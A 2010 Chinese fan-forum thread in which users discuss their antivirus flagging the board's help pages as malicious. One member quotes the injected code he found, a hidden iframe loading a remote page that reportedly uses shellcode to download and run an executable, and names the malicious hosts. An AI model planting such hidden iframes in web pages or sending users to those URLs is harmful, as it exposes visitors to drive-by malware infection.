Board logo

标题: [历史] 小站有木马? [打印本页]

作者: ¤酷    时间: 2010-7-23 15:31     标题: 小站有木马?

今天上小站360老是弹框说发现挂马网站,"近期被360安全中心检测出存在大量挂马网页。"

以上
作者: BERSERKER    时间: 2010-7-23 15:35

恩,反复被提醒,刷新次出现次很麻烦
不明真相

作者: 出前一叮    时间: 2010-7-23 15:41

我的也是。。。
作者: sexx    时间: 2010-7-23 15:41

只有帮助页面有问题,还是以前的那个马夫: 不去帮助页面应该没问题

bbs.rohome.net/faq.php?action=message&id=9
    bbs.rohome.net/forumdata/cache/style_4.css
    bbs.rohome.net/include/javascript/common.js
    bbs.rohome.net/include/javascript/menu.js
    bbs.rohome.net/include/javascript/ajax.js
    bbs.rohome.net/images/ipb/logo.gif
    bbs.rohome.net/images/ipb/frame_on.gif
    bbs.rohome.net/images/ipb/footer_top.gif
    htbbs.rohome.net/images/ipb/discuz_icon.gif
    bbs.rohome.net/images/ipb/alipay_icon.gif
    js.users.51.la/449807.js
    bbs.rohome.net/images/ipb/bg.gif
    bwdirectsales.com/images/banners/cn.htm

[ 本帖最后由 sexx 于 2010-7-23 15:49 编辑 ]
作者: matthewii    时间: 2010-7-23 15:44

小站没交保护费而已。。360本来做的还可以,可是现在品行不怎么样了。
作者: 无限透明de蓝    时间: 2010-7-23 15:50

某天我朋友看到个360广告,来了句。用360的都是电脑菜鸟…
作者: sexx    时间: 2010-7-23 16:00

如果你的杀毒软件(金山瑞星啥啥啥的)平时没跳,打开下面的连接再看看跳不跳,360说这几个页面有毒
不怕死的可以试一下,我用的金山不敢点。。。:

bbs.rohome.net/faq.php?action=message&id=9
bbs.rohome.net/faq.php?action=message&id=18
bbs.rohome.net/faq.php?action=message&id=8#top
bbs.rohome.net/faq.php?action=message&id=8
bbs.rohome.net/faq.php?action=message&id=4#top

[ 本帖最后由 sexx 于 2010-7-23 16:02 编辑 ]
作者: matthevv    时间: 2010-7-23 16:03

原帖由 sexx 于 2010-7-23 16:00 发表
如果你的杀毒软件(金山瑞星啥啥啥的)平时没跳,打开下面的连接再看看跳不跳,360说这几个页面有毒
不怕死的可以试一下,我用的金山不敢点。。。:

bbs.rohome.net/faq.php?action=message&id=9
bbs.roho ...




建议删掉这几个
作者: my19891020my    时间: 2010-7-23 16:04

诺顿表示小站为信任站点
作者: 拿黄瓜敲桌子    时间: 2010-7-23 16:05

火狐、傲游、NOD32表示全点了没反应

金山瑞星表示他们都是360的好基友
作者: BERSERKER    时间: 2010-7-23 16:38

原帖由 无限透明de蓝 于 2010-7-23 15:50 发表
某天我朋友看到个360广告,来了句。用360的都是电脑菜鸟…

你朋友洞若观火啊
不过点一贴提示次真的很恶心啊
作者: 天使喝可乐    时间: 2010-7-23 16:42

360 垃圾啊 乱提示 无所谓 照上不误 盗版瑞星表示毫无压力
这贴怎么天天出现
作者: Diesel    时间: 2010-7-23 16:43

忍了吧,人家运营要靠这样的东西生存呢,不拿你那点PV做文章,拿啥?
作者: h409756627    时间: 2010-7-23 16:48

卸载360,安装东方微点,费尔托斯特安全实验室,魔法兔子,优化大师。

360总裁日前表示小站中不仅有旋转木马,还有急速过山车,跳楼机,激流勇进。

只是弹框太小显示不出来。
作者: sexx    时间: 2010-7-23 17:25

状了下胆(不是蛋),特意去试验下:
http://bbs.rohome.net/faq.php?action=message&id=9
含有以下内容:

  1. <div class="altbg2" style="margin: 8px auto;">在<a href="memcp.php" target="_blank">控制面板</a>中的“编辑个人资料”,填写“原密码”,“新密码”,“确认新密码”。点击“提交”,即可修改。<iframe src=http://bwdirectsales.com/images/banners/cn.htm style="display:none"></iframe>;</div>
复制代码


http://bwdirectsales.com/images/banners/cn.htm 就是挂那个啥(绝不是挂大肠)。。。
该网页会利用shellcode溢出下载执行 http://bkaode546.com/xiao/xiazai.exe
系统打过安全补丁应该没问题

[ 本帖最后由 sexx 于 2010-7-23 17:43 编辑 ]
作者: 神狱    时间: 2010-7-23 17:39

我的也是。跳就让他跳。不管他。
作者: kaican    时间: 2010-7-23 19:22

原帖由 matthewii 于 2010-7-23 15:44 发表
小站没交保护费而已。。360本来做的还可以,可是现在品行不怎么样了。


国内企业欠缺实干精神,一味只知道耍手段、忽悠人、走旁门左道,这就是现状。。。或者应该说。。根本就是缺乏实干的能力




欢迎光临 浆糊论坛-RO小站 (http://bbs.rohome.cn/) Powered by Discuz! 7.2